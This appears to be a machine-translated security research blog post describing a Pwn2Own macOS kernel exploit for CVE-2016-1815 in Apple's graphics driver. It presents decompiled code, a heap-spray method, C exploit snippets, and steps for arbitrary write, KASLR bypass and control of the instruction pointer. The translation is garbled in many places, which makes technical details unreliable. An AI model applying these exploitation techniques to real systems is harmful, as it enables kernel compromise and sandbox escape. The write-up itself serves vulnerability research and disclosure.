a rectangle pwn drops one of the whole kernel series - zone dance

Posted by tetley at 2020-03-24

A rectangle PWN drops one of the whole kernel series - zone dance

Does a rectangle PWN drop the whole kernel? It sounds like Madrid didn't think about it, but it happened in pwn2own in Vancouver in March this year. This series of articles will share our experience in the discovery and utilization of blitzard cve-2016-1815 used for sandbox escape. In this paper, we will first ask you to introduce the second and third steps – the dance of kalloc.48 and kalloc.8192 sword without front. In the last article, we will return to the origin and introduce the cause of the vulnerability.

Blitzard kalloc.48的舞蹈 kalloc.8192 重剑无锋

Take away

We use the OOB of a vector to cross the boundary, and convert it into a primitive with arbitrary address but limited value through careful heap memory layout. Then we use the primitive to implement infoleak to bypass kaslr and finally control rip.

Igvector:: add function

char __fastcall IGVector<rect_pair_t>::add(IGVector *this, rect_pair_t *a2) { v3 =; if ( this->currentSize != this->capacity ) goto LABEL_4; LOBYTE(v4) = IGVector<rect_pair_t>::grow(this, 2 * v3); if ( v4 ) LABEL_4: this->currentSize += 1; v5 =; *(this->storage + 32 * this->currentSize + 24) = a2->field_18; //rect2.len height *(this->storage + 32 * this->currentSize + 16) = a2->field_10; //rect2.y x *(this->storage + 32 * this->currentSize + 8) = a2->field_8; //rect1.len height *(this->storage + 32 * this->currentSize) = a2->field_0; //rect1.y x } return v4;

Igvector is a generic template class frequently used in the apple graphics driver. Its head is currentsize field, followed by a capacity field, which records the maximum capacity of the current vector. This field is followed by the storage pointer, which represents the heap address of the storage area of this vector. Rect ﹣ pair ﹣ is a pair of rectangles. Each rectangle uniquely represents a drawing area on the screen. Its field is as follows:

IGVector currentSize capacity storage rect_pair_t

x. Y represents the coordinates of the rectangle angle, while W and H represent the width and height of the rectangle. These four elements can determine a rectangle only in the coordinate system. At the beginning, these rectangles existed in the form of shaping, but after a series of scaling and segmentation operations, they were transformed into ieee.754 floating-point numbers. These floating-point operations bring us some difficulties in reverse driving, because the F5 plug-in of IDA can't recognize and organize SSE floating-point instructions very well. At the same time, it also limits the content that our OOB can control.

x,y w,h

When this OOB occurs, the memory layout is as shown in the following figure: it can be found that the igvector:: add function call occurs on a 48 size igvector that is partially out of bounds. But here sizefield is nailed to 0xdeadbeefdeadbeef because kalloc.48 is smaller than cacheline, so it must be dyed by zone allocator after free. Fortunately, capacity and storage are two things we can control. If the following conditions can be met, then we have an arbitrary address write across all address spaces.

IGVector::add IGVector size capacity storage


But it's still not a primitive that writes arbitrary values. As mentioned earlier, the fields of the rectangle exist in the form of signed int16, that is, in the range of [- 0x8000, 0x7ffff]. When the functions triggering OOB are called, they have been processed into ieee.754 floating-point numbers, which means that we can only use this primitive to trigger two consecutive values four times in the range [0x3 0x4... 0xc... 0xd... , 0xbf800000] is written in 4 bytes (where 0xbf800000 is the floating-point representation of - 1), and finally 32 bytes of memory is written out.

It seems that this is not good news, but here we need to find a way to stabilize this bad writing first, and then introduce how to use this writing to complete the final utilization.

Control zone kalloc.48

As shown in the above figure, we need to precisely control the memory content when the overflow occurs, otherwise bad access will be generated and the kernel will crash. Unfortunately, kalloc.48 happens to be a relatively active zone in the kernel, among which iochaport is the largest active molecule. It is self-evident that the memory content of the iomachinport is not controllable, that is to say, we need to avoid its interference.

IOMachPort IOMachPort

Throughout the history, the commonly used memory layout method is to use IO open service extended and ool msg to layout the kernel heap. But they have their own advantages and disadvantages: – ool ﹣ MSG has little side-effect on the heap, but the content of the header 0x18 bytes is uncontrollable, and our vulnerability just requires the precise 8-byte control of the header 0x8 bytes – IO ﹣ open ﹣ service ﹣ extended will cause huge side-effect in kalloc.48, because each time we implement heap injection, we will cause a new iomachport to be allocated

io_open_service_extended ool_msg ool_msg io_open_service_extended IOMachPort

We found and used a new heap spray method here: iocataloguesenddata. As shown in the following code snippet. Only one masterport is needed to implement the heap injection, with small side effects, energy saving and environmental protection

IOCatalogueSendData IOCatalogueSendData( mach_port_t _masterPort, uint32_t flag, const char *buffer, uint32_t size ) { //... kr = io_catalog_send_data( masterPort, flag, (char *) buffer, size, &result ); //... if ((masterPort != MACH_PORT_NULL) && (masterPort != _masterPort)) mach_port_deallocate(mach_task_self(), masterPort); //... } /* Routine io_catalog_send_data */ kern_return_t is_io_catalog_send_data( mach_port_t master_port, uint32_t flag, io_buf_ptr_t inData, mach_msg_type_number_t inDataCount, kern_return_t * result) { //... if (inData) { //... kr = vm_map_copyout( kernel_map, &map_data, (vm_map_copy_t)inData); data = CAST_DOWN(vm_offset_t, map_data); // must return success after vm_map_copyout() succeeds if( inDataCount ) { obj = (OSObject *)OSUnserializeXML((const char *)data, inDataCount); //... switch ( flag ) { //... case kIOCatalogAddDrivers: case kIOCatalogAddDriversNoMatch: { //... array = OSDynamicCast(OSArray, obj); if ( array ) { if ( !gIOCatalogue->addDrivers( array , flag == kIOCatalogAddDrivers) ) { //... } break; //... } bool IOCatalogue::addDrivers( OSArray * drivers, bool doNubMatching) { //... while ( (object = iter->getNextObject()) ) { // xxx Deleted OSBundleModuleDemand check; will handle in other ways for SL OSDictionary * personality = OSDynamicCast(OSDictionary, object); //... // Add driver personality to catalogue. OSArray * array = arrayForPersonality(personality); if (!array) addPersonality(personality); else { count = array->getCount(); while (count--) { OSDictionary * driver; // Be sure not to double up on personalities. driver = (OSDictionary *)array->getObject(count); //... if (personality->isEqualTo(driver)) { break; } } if (count >= 0) { // its a dup continue; } result = array->setObject(personality); //... set->setObject(personality); } //... }

The adddrivers function takes osarray as input, which meets the following conditions: – osarray contains osdict – osdict contains key ioproviderclass – osdict cannot be the same as osdict that already exists in the catalog

addDrivers OSArray OSArray OSDict OSDict IOProviderClass OSDict OSDict

We can prepare our layout payload in the following XML format, and send them through iocataloguesenddata (master port, 2, buf, 4096). Send as many times as you want

<array> <dict> <key>IOProviderClass</key> <string>ZZZZ</string> <key>ZZZZ</key> <array> <string>AAAAAAAAAAAAAAAAAAAAAA</string> <string>AAAAAAAAAAAAAAAAAAAAAB</string> ... <string>ZZZZZZZZZZZZZZZZZZZZZZ<string> </array> </dict> </array>

With this method, we have the steps to play in kalloc.48: – spray a combination of VM map copy and 50 iocataloguesenddata (the content is completely controllable), the size is 0x30 – release 1 / 3 to 2 / 3 of the ool MSG, dig a hole in the heap – trigger the leak hole, and let people fall into the hole. Because we dig enough pits, the layout of the pile will tend to be stable, with a great probability to meet our expectations, allowing us to achieve stable and multiple arbitrary address writing, completing the first step of the three steps.

vm_map_copy IOCatalogueSendData ool_msg

What about the back?

Control rip with a float

When we have a stable write, how to control rip? A naive idea is to write the virtual table pointer of userclient directly. However, due to the limitation of the vulnerability's write range, this is not feasible, as shown in the following figure: note that the address space beginning with 0xbf in the kernel is an illegal address.

However, thanks to the MOV instruction in x86, we do not require strict 8-byte alignment. In fact, we can write a 4-byte alignment, as shown in the following figure:

It looks like that, but it's not so simple. In the vast number of userclients, only the high byte of VTable pointer address of rootdomainuserclient is 0xffffff80, while the high address of other userclient VTable pointers is 0xffff7f. However, according to the characteristics of kaslr, the kernel heap address can hardly occupy this area. Is it feasible to write out the rootdomainuserclient?

RootDomainUserClient RootDomainUserClient

Why spray so slowly?

Because the size of rootdomainuserclient is relatively small, we need to spray a large number of the userclient to ensure that there is a relatively large probability that the userclient will be located at some predicted addresses. In the process of practice, we found that the injection speed decreased in quadratic form with the increase of the number of userclients. We investigated some relevant codes, as shown in the following figure:

RootDomainUserClient bool IORegistryEntry::attachToParent( IORegistryEntry * parent, 1621 const IORegistryPlane * plane ) 1622 { 1623 OSArray * links; 1624 bool ret; 1625 bool needParent; //... 1635 ret = makeLink( parent, kParentSetIndex, plane ); 1636 1637 if( (links = parent->getChildSetReference( plane ))) 1638 needParent = (false == arrayMember( links, this )); 1639 else 1640 needParent = true; 1641 //... 1669 if( needParent) 1670 ret &= parent->attachToChild( this, plane ); 1671 1672 return( ret );

We can see that arraymember does linear search for the attached client. If you have studied, you should realize that this is an O (n ^ 2) complexity.


The later code makes this more complicated. Before the userclient is opened, they need to attach to the corresponding parent, which will call parent - > attachtochild

parent->attachTochild bool IORegistryEntry::attachToChild( IORegistryEntry * child, 1684 const IORegistryPlane * plane ) 1685 { 1686 OSArray * links; //... 1694 1695 ret = makeLink( child, kChildSetIndex, plane ); ``` then ``` bool IORegistryEntry::makeLink( IORegistryEntry * to, 1314 unsigned int relation, 1315 const IORegistryPlane * plane ) const 1316 { 1317 OSArray * links; 1318 bool result = false; //... 1323 result = arrayMember( links, to ); 1324 if( !result) 1325 result = links->setObject( to ); 1326 1327 } else {

Here links is a OSArray, and setObject inserts the new userclient into the array store, and then calls a time-consuming function:

links setObject unsigned int OSArray::ensureCapacity(unsigned int newCapacity) 185 { //... 203 newArray = (const OSMetaClassBase **) kalloc_container(newSize); 204 if (newArray) { 205 oldSize = sizeof(const OSMetaClassBase *) * capacity; 206 207 OSCONTAINER_ACCUMSIZE(((size_t)newSize) - ((size_t)oldSize)); 208 209 bcopy(array, newArray, oldSize); 210 bzero(&newArray[capacity], newSize - oldSize); 211 kfree(array, oldSize); 212 array = newArray;

So the conclusion from this round is that the injection of userclient has the time complexity of O (n ^ 2), which forces us to choose a large userclient for the heap injection, because this year's competition model MacBook uses a core processor that can be ignored, which will make the explosion run slower than the snail, if we still hang on the root domain userclient tree.


Igaccelvideocontext is coming to the rescue

We continue to search for available userclients based on the following conditions: – must be able to open and call from the sandbox – the size must be greater than PageSize, the larger the better

The igaccelvideocontext occupying two pages is exactly the Savior we are looking for. Basically, all ioaccelerator family2 userclients have a service pointer to intelcaccelerator. For igaccelvideocontext, it is at 0x528. We can write down the lower 4 bytes of the heap address to point it to the heap content under our control and trigger the virtual call.

IGAccelVideoContext service IntelAccelerator IGAccelVideoContext

RIP control

Although there are virtual function calls here, we can't call the virtual function of service directly, because the content header of VM map copy layout mentioned above is uncontrollable. Here, the context [u finish interface indirectly calls virtual functions on the service - > meventmachine, which just meets our needs.

service vm_map_copy context_finish service->mEventMachine __int64 __fastcall IOAccelContext2::context_finish(IOAccelContext2 *this) { int v1; // [email protected] unsigned int v2; // [email protected] v1 = this->service->mEventMachine->vt->__ZN24IOAccelEventMachineFast219finishEventUnlockedEP12IOAccelEvent( this->service->mEventMachine,

Now let's adjust the direction and write down the service field of any igaccelvideocontext. Without knowing the specific heap address, we have to continue spraying. The specific steps are as follows: – spray 0x50000 ool · msgs, push the heap to 0xffffff80 bf800000 (address B) - release the middle, spray igaccelvideocontext, and ensure that the middle address a 0xffff80 62388000 is occupied by it - trigger the vulnerability, write a - 4 + 0x528, Write the service pointer as 0xffffff80 bf800000 (address B) - call the external method of these sprayed userclients to check the corruption

IGAccelVideoContext service B A A - 4 + 0x528 service

Why do we choose a and B, which look like magic number addresses? As we mentioned earlier, we can only write floats in a specific range. For example, we can write 0xffffff80 deadbeef as 0xffffff80 3xxxxxx, 0xffff80 4xxxxxx, 0xffffff80 cxxxxxx, 0xffffff80 dxxxxxx and 0xffffff80 bf800000. But in so many addresses, it is too low (kslide will change every time it starts, and the high slide will push the heap base address to 0xffffff80 4xxxxxx), or it's too high (not enough memory, too long to spray). So in the end, we choose to write 0xbf800000, half of which is a

The steps are as follows:

mach_msg_size_t size = 0x2000; mach_port_name_t my_port[0x500]; memset(my_port, 0, 0x500 * sizeof(mach_port_name_t)); char *buf = malloc(size); memset(buf, 0x41, size); *(unsigned long *)(buf - 0x18 + 0x1230) = 0xffffff8062388000 - 0xd0 + 2; *(unsigned long *)(buf - 0x18 + 0x230) = 0xffffff8062388000 - 0xd0 + 2; for (int i = 0; i < 0x500; i++) { *(unsigned int *)buf = i; printf("number %x success with %x.\n",i , send_msg(buf, size, &my_port[i])); } for (int i = 0x130; i < 0x250; i++) { read_kern_data(my_port[i]); } printf("press enter to fill in IOSurface2.\n"); io_service_t serv = open_service("IOAccelerator"); io_connect_t *deviceConn2; deviceConn2 = malloc(0x12000 * sizeof(io_connect_t)); kern_return_t kernResult; for (int i =0; i < 0x12000; i ++) { kernResult = IOServiceOpen(serv, mach_task_self(), 0x100, &deviceConn2[i]); printf("%x with result %x.\n", i , kernResult); }

This picture will see better.

So it's over here? Not yet.

Head or middle?

Smart readers may have problems in front of them. You spray 0x2000. How can you guarantee that a is just in the user client header you spray? Maybe in the middle.

Yes, it is. If it falls in the middle, we need to write out a - 4 + 0x528 and a - 4 + 0x528 + 0x1000 to ensure coverage in both cases.

A - 4 + 0x528 A - 4 + 0x528 + 0x1000

Bypassing kASLR

What happened to kaslr? Now we know that address a is overwritten by igaccelvideocontext, and address B is overwritten by VM map? Copy. Now that we have made the pointer point to the user client of the fake layout, is there any interface that can return the content of an address in a user client? Get ABCD steps found by searching

IGAccelVideoContext vm_map_copy get_hw_steppings


\ __int64 __fastcall IGAccelVideoContext::get_hw_steppings(IGAccelVideoContext *a1, _DWORD *a2) { __int64 service; // [email protected] service = a1->service; *a2 = *(_DWORD *)(service + 0x1140); a2[1] = *(_DWORD *)(service + 0x1144); a2[2] = *(_DWORD *)(service + 0x1148); a2[3] = *(_DWORD *)(service + 0x114C); a2[4] = *(unsigned __int8 *)(*(_QWORD *)(service + 0x1288) + 0xD0LL); return 0LL; } \

Pay attention to this line.



a24 = *(unsigned __int8 *)(*(_QWORD *)(service + 0x1288) + 0xD0LL);

`\Recall that service + 0x1288 has been controlled by us, so this is a perfect primitive read from any address. We take the following steps: – fill VM map copy at B – trigger vulnerability, override service pointer to B, which means it points to VM map copy filled with 0x414141414141 (except for 0x1288, which is set to a-0xd0) - call get HW steps to detect 414141. If this result is returned, then this userclient has been modified by us – A24 returns one byte of a address, repeat the above steps and read all contents

\ service+0x1288

The picture below will make you understand better.

Head or middle

Smart readers will realize that B may also fall in the middle of VM map copy, just like a. For the B problem, as the above solution, we write 0x1288 and 0x288 as a – 0xd0. If we read the normal igaccelvideocontext 0x1000 offset, then it is 0 according to its characteristics


This means that we can distinguish the head and tail through this feature, and try twice at most, as shown in the figure below. Finally realize arbitrary address disclosure


The video of this attack can be found at

So what is the magic matrix flaw? It's so complicated to exploit. How about the loopholes? Please look forward to the following articles. If you can't wait, please see our ppt on blackhat USA